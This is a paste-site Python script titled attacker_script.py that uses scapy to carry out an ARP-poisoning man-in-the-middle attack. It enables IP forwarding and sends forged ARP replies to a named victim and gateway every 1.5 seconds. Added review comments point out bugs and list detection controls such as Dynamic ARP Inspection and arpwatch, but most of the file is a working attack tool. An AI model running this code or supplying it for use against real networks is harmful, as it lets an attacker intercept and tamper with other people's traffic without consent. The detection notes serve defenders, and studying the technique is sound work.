AppajiC

attacker_script.py

Sep 25th, 2022
  1. import scapy.all as scapy
  2. import sys
  3. import os
  4. import time
  5. import argparse
  6. import netifaces as ni
  7.  
  # Command-line interface: all three options are mandatory strings.
  # Nothing here checks that --victim / --gateway are well-formed IPv4
  # addresses; they are passed on as given.
  parser = argparse.ArgumentParser(description="Attacking script to be run in xterm.")
  for _short, _long, _help in (
      ("-i", "--interface", "Interface of the attacker"),
      ("-v", "--victim", "Victim's IP address"),
      ("-g", "--gateway", "Gateway's IP address"),
  ):
      parser.add_argument(_short, _long, type=str, required=True, help=_help)
  18.  
  19.  
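  def set_ip_forwarding(value):
      """Turn IPv4 forwarding on this host on (1) or off (0).

      Writes the flag to /proc/sys/net/ipv4/ip_forward directly instead of
      interpolating ``value`` into a shell command, so a value other than
      0 or 1 can never reach a shell.

      Args:
          value: 0 or 1 (int or str).

      Raises:
          ValueError: if ``value`` is anything other than 0 or 1.
      """
      flag = str(value).strip()
      if flag not in ("0", "1"):
          raise ValueError(f"ip_forward must be 0 or 1, got {value!r}")
      try:
          with open("/proc/sys/net/ipv4/ip_forward", "w") as proc_file:
              proc_file.write(flag + "\n")
      except OSError as exc:
          # Kept best-effort like the original os.system() call, but the
          # failure is now reported instead of being ignored. A host left
          # with forwarding enabled keeps routing other machines' traffic.
          print(f"[!] Could not set ip_forward={flag}: {exc}", file=sys.stderr)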
  22.  
  23.  
  def get_mac_by_IP(IP):
      """Resolve ``IP`` to a MAC address with a broadcast ARP request.

      Sends one Ethernet-broadcast ARP query on the module-level
      ``interface`` and waits up to 2 seconds for answers.

      Returns:
          The Ethernet source address of the first reply, or None when
          nothing answered. No exception is raised for the no-answer case,
          so callers have to check for None themselves.
      """
      scapy.conf.verb = 0  # silence scapy's own progress output
      probe = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / scapy.ARP(pdst=IP)
      answered, _unanswered = scapy.srp(
          probe,
          timeout=2,
          iface=interface,
          inter=0.1,
      )
      first_pair = next(iter(answered), None)
      if first_pair is None:
          return None
      _sent, reply = first_pair
      return reply.sprintf(r"%Ether.src%")
  34.  
  35.  
  def reset_ARP():
      """Re-announce the real IP-to-MAC bindings, disable forwarding, exit.

      Looks up the current MAC of the victim and of the gateway, then sends
      7 ARP replies in each direction carrying the looked-up hardware
      address, so both hosts can replace the poisoned cache entry.
      Afterwards IP forwarding is switched off and the process exits with
      status 1.

      NOTE(review): nothing in the visible code calls this function (the
      KeyboardInterrupt handler in mitm() is commented out), so an
      interrupted run leaves the poisoned entries in place until they age
      out and leaves ip_forward enabled on this host.
      NOTE(review): get_mac_by_IP() returns None when a host does not
      answer; that None is passed straight into hwsrc here.
      """
      print("\n[*] Restoring Targets...")
      true_victim_mac = get_mac_by_IP(victim_IP)
      true_gateway_mac = get_mac_by_IP(gateway_IP)

      # (host to correct, IP being announced, real MAC of that IP)
      corrections = (
          (gateway_IP, victim_IP, true_victim_mac),
          (victim_IP, gateway_IP, true_gateway_mac),
      )
      for target_ip, announced_ip, real_mac in corrections:
          correction = scapy.ARP(
              op=2,
              pdst=target_ip,
              psrc=announced_ip,
              hwdst="ff:ff:ff:ff:ff:ff",
              hwsrc=real_mac,
          )
          scapy.send(correction, count=7)

      set_ip_forwarding(0)
      print("[*] Shutting Down...")
      sys.exit(1)
  63.  
  64.  
  def mitm():
      """Resolve both targets, then send forged ARP replies in a loop.

      Two ARP replies (op=2) are built: one addressed to the victim that
      claims the gateway's IP, one addressed to the gateway that claims the
      victim's IP. Neither sets hwsrc, so the sender hardware address is
      whatever scapy fills in by default (presumably this host's interface
      MAC; confirm against scapy's defaults). Both are re-sent every 1.5
      seconds, forever.

      Detection notes: this traffic is unsolicited ARP replies at a fixed
      interval in which one MAC claims two different IPs, one of them the
      gateway's. Switch-side Dynamic ARP Inspection, static ARP entries for
      the gateway, and ARP-cache change monitoring (arpwatch-style) are the
      usual controls against it.

      NOTE(review): get_mac_by_IP() returns None rather than raising when a
      host does not answer, so the "Couldn't Find ... MAC Address" branches
      are not reached in that case and hwdst=None is used instead.
      NOTE(review): the loop has no interrupt handling; reset_ARP() and
      set_ip_forwarding(0) are not run when the script is stopped.
      """

      def _lookup(label, ip, failure_message):
          # Resolve one target; on any exception undo forwarding and exit.
          try:
              mac = get_mac_by_IP(ip)
              print(f"{label}: (IP={ip}, MAC={mac})")
          except Exception:
              set_ip_forwarding(0)
              print(failure_message)
              print("[!] Exiting...")
              sys.exit(1)
          return mac

      victim_MAC = _lookup("victim", victim_IP, "[!] Couldn't Find Victim MAC Address")
      gateway_MAC = _lookup("gateway", gateway_IP, "[!] Couldn't Find Gateway MAC Address")
      print("[*] Poisoning Targets...")

      to_victim = scapy.ARP(op=2, pdst=victim_IP, psrc=gateway_IP, hwdst=victim_MAC)
      to_gateway = scapy.ARP(op=2, pdst=gateway_IP, psrc=victim_IP, hwdst=gateway_MAC)
      forged = (to_victim, to_gateway)
      for pkt in forged:
          pkt.show()

      while True:
          for pkt in forged:
              scapy.send(pkt)
          print("Packets Sent")
          time.sleep(1.5)
  118.  
  119.  
  if __name__ == "__main__":
      # Entry point: read the CLI options into the module-level names the
      # functions above rely on, report this host's addresses, enable IP
      # forwarding and start the loop.
      args = parser.parse_args()
      interface = args.interface
      victim_IP = args.victim
      gateway_IP = args.gateway

      link_info = ni.ifaddresses(interface)
      attacker_IP = link_info[ni.AF_INET][0]["addr"]
      attacker_MAC = link_info[ni.AF_LINK][0]["addr"]
      print(f"Attacker: (IP={attacker_IP}, MAC={attacker_MAC})")

      # NOTE(review): forwarding is enabled here and nothing on this path
      # disables it again if mitm() is interrupted.
      set_ip_forwarding(1)
      mitm()